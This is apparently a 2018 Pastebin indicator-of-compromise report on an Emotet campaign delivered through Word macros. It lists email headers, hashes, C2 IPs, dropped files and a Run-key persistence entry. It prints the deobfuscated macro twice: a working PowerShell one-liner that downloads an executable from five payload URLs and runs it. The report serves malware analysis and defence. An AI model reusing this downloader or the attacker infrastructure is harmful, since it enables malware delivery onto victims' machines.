SHARE
TWEET

#emotet_201218

VRad Dec 23rd, 2018 (edited) 214 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet #feodo #W97M #powershell
  2.  
  3. https://pastebin.com/EejcbL4t
  4.  
  5. previous contact:
  6. 04/12/18        https://pastebin.com/znQDtbnt  
  7. 09/11/18        https://pastebin.com/THHMs2wg
  8. 01/10/18        https://pastebin.com/Y6DnbpHv
  9.  
  10. FAQ:
  11. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  12. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  13.  
  14. attack_vector
  15. --------------
  16. email attach .doc > macro > cmd > powershell > GET 5 URL > %temp%\***.exe
  17.  
  18. email_headers
  19. --------------
  20. Received: from server.arroyo.bz (server.arroyo.bz [65.60.8.150])
  21.     by srv8.victim1.com for <user0@org7.kv.victim1.com>;
  22.     Thu, 20 Dec 2018 20:00:26 +0200 (EET)
  23.     (envelope-from veronicat@mccell.com.mx)
  24. Received: from [138.122.96.73] (port=56726 helo=10.15.31.100)
  25.     by server.arroyo.bz (Exim 4.91)
  26.     for user0@org7.kv.victim1.com; Thu, 20 Dec 2018 12:00:07 -0600
  27. Date: Thu, 20 Dec 2018 12:00:40 -0600
  28. From: Вячеслав Прендзевский <prom@pride-ukraine.com.ua> <veronicat@mccell.com.mx>
  29. To: user0@org7.kv.victim1.com
  30. Subject: Вячеслав Прендзевский - Invoice 85841
  31.  
  32. files
  33. --------------
  34. SHA-256 bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80
  35. File name   Inv85841.doc
  36. File size   144.5 KB
  37.  
  38. SHA-256 270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1
  39. File name   pEakCmvuBiB.exe
  40. File size   536 KB
  41.  
  42. activity
  43. **************
  44.  
  45. deobfuscated_macro
  46. --------------
  47. powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
  48.  
  49. pl_src:     1/5
  50. --------------
  51. h11p:\ opewinsng {.}com/bOiANyEc            404
  52. h11p:\ chamanga {.} org {.}uy/eE9DiHE6      200
  53. h11p:\ ideagold {.}by/rzb6hSlC3             403
  54. h11p:\ onetechblog{.} tek1{.} top/MyZztFl   403
  55. h11p:\ maxclean{.} srv {.}br/QVtDDcAZ       404
  56.  
  57. C2:
  58. --------------
  59. http://189.226.214.129:8080/
  60.  
  61. netwrk
  62. --------------
  63. 1.22.119.250    1.22.119.250    GET / HTTP/1.1  Mozilla/4.0
  64.  
  65. comp
  66. --------------
  67.  
  68. stgintel.exe    2224    189.226.214.129 8080    SYN_SENT
  69. stgintel.exe    2224    200.124.225.32  80      SYN_SENT
  70. stgintel.exe    2224    70.80.135.35    8443    SYN_SENT
  71. stgintel.exe    2224    201.102.7.208   8443    SYN_SENT
  72. stgintel.exe    2224    189.222.245.247 80      SYN_SENT
  73. stgintel.exe    2224    1.22.119.250    80      ESTABLISHED
  74.  
  75. proc
  76. --------------
  77. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  78.  
  79. c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:...
  80.  
  81. CmD    /V:   /R "  seT  gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008...
  82.  
  83. C:\Windows\system32\cmd.exe  /S /D /c" EchO pow%PUBLIC:~5,1%r%SESSIONNAME:...
  84.  
  85. Cmd.EXe
  86.  
  87. powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
  88.  
  89. C:\tmp\583.exe
  90.  
  91. C:\Users\operator\AppData\Local\stgintel\stgintel.exe
  92.  
  93. persist
  94. --------------
  95. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              23.12.2018 13:19   
  96. stgintel   
  97. TortoisePlink   http://tortoisesvn.net 
  98. c:\users\operator\appdata\local\stgintel\stgintel.exe   22.12.2018 16:05
  99.  
  100. drop
  101. --------------
  102. C:\tmp\583.exe
  103. C:\Users\operator\AppData\Local\stgintel\stgintel.exe
  104.  
  105. VR
  106.  
  107. # # #
  108. https://www.virustotal.com/#/file/bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80/details
  109. https://www.virustotal.com/#/file/270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1/details
  110. https://analyze.intezer.com/#/analyses/9142da6d-ba72-4ff1-a515-5b187735a162
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top